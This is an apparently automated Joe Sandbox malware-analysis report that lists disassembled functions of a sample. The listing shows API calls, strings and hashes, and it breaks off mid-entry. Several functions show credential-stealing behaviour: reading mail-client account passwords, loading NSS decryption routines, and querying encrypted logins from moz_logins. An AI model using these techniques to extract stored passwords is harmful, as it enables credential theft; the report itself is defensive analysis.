                  • Opcode Fuzzy Hash: 0bbcacfff3d007f8ba4df6050e74c9d9e9b3729906fc48c14092c1c50e174df2
                  • Instruction Fuzzy Hash: 09018C757286068FD308CFA9EC80966B3B2FB992657188538DA11C3266DE34A511CA54
                  Function 00404DE5 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                  • Instruction ID: e46ac8c8d649937048925bbc22b10e31c7d260e61c9919193dd0f57e0586c858
                  • Opcode Fuzzy Hash: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                  • Instruction Fuzzy Hash: 75011E326019208FA38DCE3AC80545377E3FFCA325326C1E8D845AB579D6316802CBD4
                  Function 00404E56 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                  • Instruction ID: 1c8cf4990013556009a943ce68bbe5c533817c3d042a03847a5f6a4628de1edc
                  • Opcode Fuzzy Hash: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                  • Instruction Fuzzy Hash: DA01E8326159308FA389DE3AC80144377E3FFCA32532AC1E5C945AB57DD6316847DB90
                  Function 0040FEB1 Relevance: 87.8, APIs: 8, Strings: 42, Instructions: 307stringCOMMON
                  Download Yara Rule
                  APIs
                  • strlen.MSVCRT ref: 004102D0
                  • strncmp.MSVCRT(?,00414FF4,00000000,00414FF4,?,?,?), ref: 004102E0
                  • memcpy.MSVCRT ref: 0041035C
                  • atoi.MSVCRT ref: 0041036D
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00410399
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                  • String ID: $PA$$QA$$RA$,PA$,QA$,RA$4PA$4QA$4RA$<PA$<QA$<RA$DPA$DQA$DRA$LPA$LQA$LRA$TPA$TQA$TRA$\PA$\QA$\RA$dPA$dQA$dRA$lPA$lQA$lRA$tPA$tQA$tRA$|PA$|QA$|RA$PA$PA$QA$QA$RA$RA
                  • API String ID: 1895597112-403538104
                  • Opcode ID: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
                  • Instruction ID: 0fafc75884cef128377fd64f4b7a28f8ddc93d47313dbc0ddeda27c5dc7f40ea
                  • Opcode Fuzzy Hash: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
                  • Instruction Fuzzy Hash: 6FF1D5B1805A98DEDF21CF94C9887DDBBB0BB85308F1481CAD5586B241C7B94AC9CF9D
                  Function 00410D67 Relevance: 80.8, APIs: 23, Strings: 23, Instructions: 309stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcmp$_stricmp$memcpystrlen
                  • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                  • API String ID: 1113949926-2499304436
                  • Opcode ID: 0a2286a2ee10144d1cd19d55ef64d0b704ba42cbf857e026c28c1a280e809191
                  • Instruction ID: fdd8238c1ffaca80b8f1a937c0ff3988063f93198c4aeb5310ca970d52cdd6dd
                  • Opcode Fuzzy Hash: 0a2286a2ee10144d1cd19d55ef64d0b704ba42cbf857e026c28c1a280e809191
                  • Instruction Fuzzy Hash: 8E9160B21097049DE628B632ED02BDB73D8AF4431CF21052FF55AE6182EEBDB991465C
                  Function 0040C9AA Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040C9CF
                  • strlen.MSVCRT ref: 0040C9DA
                  • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C9E7
                  • _stricmp.MSVCRT(00000000,server), ref: 0040CA24
                  • _stricmp.MSVCRT(00000000,identities), ref: 0040CA46
                  • strlen.MSVCRT ref: 0040CA66
                  • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040CA73
                  • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040CABC
                  • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040CADE
                  • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040CB00
                  • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040CB22
                  • atoi.MSVCRT ref: 0040CB30
                    • Part of subcall function 0040C923: memset.MSVCRT ref: 0040C959
                    • Part of subcall function 0040C923: memcpy.MSVCRT ref: 0040C97B
                    • Part of subcall function 0040C923: atoi.MSVCRT ref: 0040C98F
                  • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040CB44
                  • _stricmp.MSVCRT(?,true,00000000), ref: 0040CB57
                  • strlen.MSVCRT ref: 0040CB72
                  • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040CB7F
                  • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040CBC4
                  • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CBE6
                  • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CC05
                  • strlen.MSVCRT ref: 0040CC20
                  • strlen.MSVCRT ref: 0040CC2A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                  • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                  • API String ID: 736090197-593045482
                  • Opcode ID: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
                  • Instruction ID: 863115145772795da6afe78a2776049e9b2399cf567c3eb7605af69a2dd2c254
                  • Opcode Fuzzy Hash: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
                  • Instruction Fuzzy Hash: 4F71C432504209FEEB10EB61DD42BDE77A5DF50328F20426BF945B21D1EB7CAE919A4C
                  Function 0040D003 Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 287stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
                    • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                    • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
                    • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                  • memset.MSVCRT ref: 0040D0C4
                  • memset.MSVCRT ref: 0040D0D6
                  • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D139
                  • strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D14F
                  • strcpy.MSVCRT(?,0040D972,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D165
                  • strcpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D17B
                  • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D191
                  • strcpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,00000104,00000000,?,0040D972,?,00000000), ref: 0040D1A4
                  • memset.MSVCRT ref: 0040D1BF
                  • memset.MSVCRT ref: 0040D1D3
                  • memset.MSVCRT ref: 0040D239
                  • memset.MSVCRT ref: 0040D24D
                  • memset.MSVCRT ref: 0040D261
                  • sprintf.MSVCRT ref: 0040D279
                  • sprintf.MSVCRT ref: 0040D28B
                  • sprintf.MSVCRT ref: 0040D29D
                  • _stricmp.MSVCRT(?,?), ref: 0040D2B3
                  • _stricmp.MSVCRT(?,?), ref: 0040D2CC
                  • _stricmp.MSVCRT(?,?), ref: 0040D2E5
                  • _stricmp.MSVCRT(?,00000204), ref: 0040D301
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$CurrentDirectoryLibraryLoadstrlen$HandleModule
                  • String ID: O4A$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                  • API String ID: 1176642800-900804342
                  • Opcode ID: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
                  • Instruction ID: cce80d09e33f880f425c5e7640b59ca7d1e8d6c5df6cdb4a6b0c5a683426509d
                  • Opcode Fuzzy Hash: 07b75e6ccac2d73e9a819f79207db565455b9c3375c3b4e8148ba61c4ba1c0b5
                  • Instruction Fuzzy Hash: CDA15372D00119AEDB20EBA5CD819DE77BCAF44308F1405ABF608F7141DA3CAA85CB58
                  Function 0040D3B5 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 339stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E56D
                    • Part of subcall function 0040E54C: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                    • Part of subcall function 0040E54C: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                    • Part of subcall function 0040E54C: memset.MSVCRT ref: 0040E5C0
                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5CA
                    • Part of subcall function 0040E54C: strlen.MSVCRT ref: 0040E5D8
                    • Part of subcall function 0040E54C: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                    • Part of subcall function 0040E54C: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                    • Part of subcall function 0040E54C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                  • memset.MSVCRT ref: 0040D430
                  • memset.MSVCRT ref: 0040D449
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D954,000000FF,?,00000104,00000104,00000000,?,0040D954,?,00000000), ref: 0040D460
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D954,?,00000000), ref: 0040D47F
                  • memset.MSVCRT ref: 0040D4F2
                  • memset.MSVCRT ref: 0040D504
                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D576
                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D589
                  • strcpy.MSVCRT(?,00000000,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D59F
                  • strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5B5
                  • strcpy.MSVCRT(?,?,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5CB
                  • strcpy.MSVCRT(?,0040D954,0040D954,00000002,0040D954,00000005,0040D954,00000004,0040D954,00000007,0040D954,00000006,0040D954,00000001), ref: 0040D5E1
                  • memset.MSVCRT ref: 0040D5FC
                  • memset.MSVCRT ref: 0040D610
                  • memset.MSVCRT ref: 0040D676
                  • memset.MSVCRT ref: 0040D68A
                  • memset.MSVCRT ref: 0040D69E
                  • sprintf.MSVCRT ref: 0040D6B6
                  • sprintf.MSVCRT ref: 0040D6C8
                  • sprintf.MSVCRT ref: 0040D6DA
                  • _stricmp.MSVCRT(?,?), ref: 0040D6F0
                  • _stricmp.MSVCRT(?,?), ref: 0040D709
                  • _stricmp.MSVCRT(?,?), ref: 0040D722
                  • _stricmp.MSVCRT(?,00000204), ref: 0040D73B
                  Strings
                  • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040D4B5
                  • imap://%s, xrefs: 0040D6C2
                  • smtp://%s, xrefs: 0040D6D4
                  • mailbox://%s, xrefs: 0040D6B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$AddressProcstrcpy$_stricmp$sprintf$ByteCharCurrentDirectoryLibraryLoadMultiWidestrlen$HandleModule
                  • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s$smtp://%s
                  • API String ID: 2893247534-4245710904
                  • Opcode ID: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                  • Instruction ID: a8d77792ad7cee7e4ffb55223bde2ad9b6e4b2884a1795ffa9bad40f06226133
                  • Opcode Fuzzy Hash: b9c130291edcc358c326a525934ef701acbcd93509fe00eddc44c50268657f0e
                  • Instruction Fuzzy Hash: FEC12D72D04119AEDB20DAA5DD859DEB7BCEF04314F1441BBF609F2191DA389E888B58
                  Function 0040EB15 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 0040EB42
                  • GetDlgItem.USER32(?,000003E8), ref: 0040EB4E
                  • GetWindowLongA.USER32(00000000,000000F0), ref: 0040EB5D
                  • GetWindowLongA.USER32(?,000000F0), ref: 0040EB69
                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0040EB72
                  • GetWindowLongA.USER32(?,000000EC), ref: 0040EB7E
                  • GetWindowRect.USER32(00000000,?), ref: 0040EB90
                  • GetWindowRect.USER32(?,?), ref: 0040EB9B
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040EBAF
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040EBBD
                  • GetDC.USER32 ref: 0040EBF6
                  • strlen.MSVCRT ref: 0040EC36
                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040EC47
                  • ReleaseDC.USER32(?,?), ref: 0040EC94
                  • sprintf.MSVCRT ref: 0040ED54
                  • SetWindowTextA.USER32(?,?), ref: 0040ED68
                  • SetWindowTextA.USER32(?,00000000), ref: 0040ED86
                  • GetDlgItem.USER32(?,00000001), ref: 0040EDBC
                  • GetWindowRect.USER32(00000000,?), ref: 0040EDCC
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040EDDA
                  • GetClientRect.USER32(?,?), ref: 0040EDF1
                  • GetWindowRect.USER32(?,?), ref: 0040EDFB
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040EE41
                  • GetClientRect.USER32(?,?), ref: 0040EE4B
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040EE83
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                  • String ID: %s:$EDIT$STATIC
                  • API String ID: 1703216249-3046471546
                  • Opcode ID: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
                  • Instruction ID: 954468ae603e5140b8f73852e098bd997e11b992376cfaf7be677857a6fc3954
                  • Opcode Fuzzy Hash: 0602b39e8c66a6b3299f776a9e3d4c07d3cdec416fd91f858be2a38e870d1518
                  • Instruction Fuzzy Hash: AAB1EF71108341AFD710DF69C985E6BBBE9FF88704F008A2DF699922A0DB75E914CF16
                  Function 00401060 Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 186COMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                  • LoadCursorA.USER32(00000067), ref: 0040115F
                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                  • EndDialog.USER32(?,00000001), ref: 0040121A
                  • DeleteObject.GDI32(?), ref: 00401226
                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                  • ShowWindow.USER32(00000000), ref: 00401253
                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                  • ShowWindow.USER32(00000000), ref: 00401262
                  • SetDlgItemTextA.USER32(?,000003EE,00418348), ref: 00401273
                  • memset.MSVCRT ref: 0040128E
                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                  • String ID: P4A
                  • API String ID: 2998058495-688682323
                  • Opcode ID: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
                  • Instruction ID: d9fb6b658f62cfbd3d3feccfc88cd7b26f9bda258aecb32a4b2b6428ade5212d
                  • Opcode Fuzzy Hash: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
                  • Instruction Fuzzy Hash: 21619D31400248FBDF129F60DD89BAA7FA5EB04715F14C1B6F908BA2F1C7759A90DB58
                  Function 0040E197 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowstringCOMMON
                  Download Yara Rule
                  APIs
                  • EndDialog.USER32(?,?), ref: 0040E1DF
                  • GetDlgItem.USER32(?,000003EA), ref: 0040E1F7
                  • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040E216
                  • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040E223
                  • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040E22C
                  • memset.MSVCRT ref: 0040E254
                  • memset.MSVCRT ref: 0040E274
                  • memset.MSVCRT ref: 0040E292
                  • memset.MSVCRT ref: 0040E2AB
                  • memset.MSVCRT ref: 0040E2C9
                  • memset.MSVCRT ref: 0040E2E2
                  • GetCurrentProcess.KERNEL32 ref: 0040E2EA
                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040E30F
                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040E345
                  • memset.MSVCRT ref: 0040E39C
                  • GetCurrentProcessId.KERNEL32 ref: 0040E3AA
                  • memcpy.MSVCRT ref: 0040E3D9
                  • strcpy.MSVCRT(?,00000000), ref: 0040E3FB
                  • sprintf.MSVCRT ref: 0040E466
                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040E47F
                  • GetDlgItem.USER32(?,000003EA), ref: 0040E489
                  • SetFocus.USER32(00000000), ref: 0040E490
                  Strings
                  • {Unknown}, xrefs: 0040E259
                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040E460
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                  • API String ID: 138940113-3474136107
                  • Opcode ID: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
